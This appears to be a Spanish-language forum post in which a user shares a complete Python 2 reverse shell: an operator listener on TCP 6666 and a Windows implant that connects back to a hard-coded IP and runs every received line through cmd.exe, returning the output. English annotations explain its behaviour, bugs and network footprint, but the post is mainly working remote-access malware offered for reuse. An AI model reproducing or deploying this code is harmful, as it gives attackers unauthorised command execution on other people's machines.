Quiero compartir con todos vosotros una shell reverse que creé hace un año o así. La shell se puede completar: no le añadí la opción de cambiar de unidad de disco, pero la comparto por si os puede servir.
cliente:
#By: HackLoper
from __future__ import print_function
import socket,time,os
# Flag read in command.init(); nothing in this file assigns it again, so the
# guarded branch there always runs.
integer = 0
# Single-slot list holding the remote working-directory string received from the
# peer; shared mutable state used as the prompt text in command.cmd().
RUTE = []
class command:
    """Operator-side console: listens on TCP 6666, accepts one peer and relays
    typed commands to it, printing whatever the peer sends back.

    The listener binds all interfaces with no authentication or encryption: any
    host that can reach the port gets the console, and all traffic is cleartext
    with no length framing (one recv() per message).
    """
    def conexion(self):
        # Accept loop: bind/listen/accept, hand off to init(); on any exception
        # (bare except) print a message, sleep 3 s and start over.
        while True:
            try:
                self.s = socket.socket()
                print("esperando...")
                self.s.bind(("",6666))      # all interfaces, hard-coded port
                self.s.listen(1)
                print("[*]---HackLoper---[*]")
                self.sc,self.addr = self.s.accept()   # peer socket and address kept on self
                self.init()
            except:
                # Bare except: also swallows KeyboardInterrupt/SystemExit.
                print('conexion perdida, reconectando...')
                time.sleep(3)
                continue
    def init(self):
        # First message from the peer is the captured cmd.exe startup output
        # (see shell.main below): clear the local console and print its first
        # two lines.
        data = self.sc.recv(9999)
        spl = data.splitlines()
        os.system('cls')        # Windows console clear
        for i in range(2):
            print (spl[i])      # IndexError if the peer sent fewer than two lines
        print('\n')
        # Second message is the remote working directory; it becomes the prompt.
        data = self.sc.recv(9999)
        if integer == 0:
            RUTE.append(data)
            i = 1               # local name only; the module-level `integer` is never updated
        self.cmd()
    def resp(self,data):
        # Print the reply minus its first and last lines (presumably the echoed
        # prompt lines), then prompt again.
        spl = data.splitlines();
        n = len(spl)
        n = n-1;
        print('\n')
        for i in range(1,n):
            print(spl[i])
        self.cmd()
    def cmd(self):
        # Prompt with the stored remote directory, read one line and send it to
        # the peer unvalidated. 'cls' is handled locally without waiting for a
        # reply; everything else waits for one recv() and dispatches on it.
        # Control flow is recursive (cmd -> cmpi -> cmd/resp -> cmd), so the
        # call stack grows by a few frames per command.
        print(RUTE[0]+'>',end ='')
        comando = raw_input('')     # Python 2 input
        if comando == 'cls':
            self.sc.send('cls')
            self.cmpi(comando)
        else:
            self.sc.send(comando)
            data = self.sc.recv(9999)   # single recv(); a longer reply spills into the next call
            self.cmpi(comando,data)
    def cmpi(self,cmmd,data=None):
        # Dispatch on the command just sent and the peer's reply.
        if cmmd == 'cd..' or cmmd[0:3] == 'cd ':
            # Directory change: the peer replies with the new path, which is
            # checked against the *local* filesystem before being adopted as
            # the prompt.
            if os.path.exists(data) == True:
                RUTE[0] = data
                print('\n')
                self.cmd();
            else:
                print (data);
                print('\n')
                self.cmd()
        elif data == 'error':
            # Peer signalled a failure; a second recv() carries the stderr text.
            error = self.sc.recv(9999);
            print(error)
            self.cmd()
        elif cmmd == 'cls':
            os.system('cls')
            self.cmd()
        else:
            self.resp(data)
servidor:
#By: HackLoper
import socket,time,subprocess,re
# Single-slot list holding the working directory parsed from cmd.exe output in
# shell.rute(); passed as cwd to every cmd.exe spawned in shell.command().
RUTE = [None]
# Hard-coded address of the operator console (the `command` listener above);
# this side only ever dials out to that one host, on the port the listener binds.
IP = "192.168.0.101"
PORT = 6666
class shell:
    """Connect-back side: dials IP:PORT, captures a cmd.exe banner, then runs
    each received line through a fresh `cmd.exe /k` and sends stdout (or the
    text 'error' followed by stderr) back over the same cleartext socket.

    Every received line reaches cmd.exe via subprocess.Popen(shell=True) with
    no allow-list, so the peer has full command execution as this process's
    user. Observable footprint: a python process repeatedly spawning cmd.exe
    with piped stdio while holding an outbound connection to a fixed IP:6666.
    """
    def conexion(self):
        # Reconnect loop: connect to IP:PORT and run main(); on any exception
        # print and retry immediately (no back-off).
        while True:
            try:
                self.s = socket.socket()
                self.s.connect((IP,PORT))
                shell.main()    # via the module-level name `shell`, rebound to the instance at the bottom of the file
            except:
                print('esperando...')
                try:
                    # Neither `client` nor `s` is defined in this scope; the
                    # resulting NameError is swallowed by the inner bare except,
                    # so no socket is actually closed here.
                    client.close()
                    s.close()
                except:
                    continue
                continue
    def main(self):
        # Spawn a bare cmd.exe, give it empty stdin and capture its startup
        # output; send that to the peer and derive the working directory from it.
        process = subprocess.Popen('cmd.exe',
            shell=True,
            stdin=subprocess.PIPE,
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE)
        process.stdin.write("")
        o,e=process.communicate()   # closes stdin, reads both pipes to EOF
        process.wait()
        process.stdin.close()
        time.sleep(1)
        self.s.send(o)      # whole stdout in one send(), no length framing
        self.rute(o)
    def rute(self,text):
        # Take the first run of prompt-like characters ending in '>' (letters,
        # digits, ':', '?', backslash, whitespace) from the cmd.exe output and
        # strip the '>' to get the directory. AttributeError if nothing matches.
        t = re.search('[?: \\\s\w]+>',text)
        repl = t.group(0).replace('>','')
        RUTE[0] = repl
        self.s.send(repl)
        self.command()
    def command(self):
        # Receive one line, run it through `cmd.exe /k` with cwd=RUTE[0], and
        # report stdout on success or stderr on failure ('error' marker first,
        # unless the line was a cd). Recursion into self.command() on every path.
        cmd = self.s.recv(9999)
        if cmd == 'cls':
            self.command()      # peer clears its own screen; nothing to execute
        process = subprocess.Popen('cmd.exe /k',
            cwd = RUTE[0].decode(),
            shell = True,
            stdin = subprocess.PIPE,
            stdout = subprocess.PIPE,
            stderr = subprocess.PIPE)
        process.stdin.write(cmd+'\n')   # received bytes go straight to cmd.exe, unfiltered
        o,e=process.communicate()
        process.wait()
        if e == '':
            process.stdin.close()
            self.correct(o,cmd)
        else:
            process.stdin.close()
            if cmd == 'cd..' or cmd[0:3] == 'cd ':
                # cd failure: stderr text is sent as the "new path" reply; the
                # peer's os.path.exists() check on it then fails and it is printed.
                self.s.send(e)
                print(e)
                self.command()
            else:
                self.s.send('error')
                self.s.send(e)
                self.command()
    def cmpi(self,t):
        # Adopt the prompt line (minus '>') as the working directory and echo it
        # to the peer, which validates it on its own filesystem.
        dec = t.decode()
        move = dec.replace('>','')
        RUTE[0] = move
        self.s.send(move)
        self.command()
    def correct(self,o,cmd):
        # Success path: for cd commands the last stdout line is taken as the new
        # prompt; any other command's stdout is sent back verbatim.
        if cmd == 'cd..' or cmd[0:3] == 'cd ':
            split = o.splitlines()
            cont = len(split)-1
            data = split[cont]      # IndexError on empty output
            self.cmpi(data)
        else:
            self.s.send(o)
            self.command()
if __name__ == '__main__':
    # Rebinds the module-level name `shell` from the class to this instance;
    # shell.conexion() relies on that when it calls shell.main().
    shell = shell()
    shell.conexion()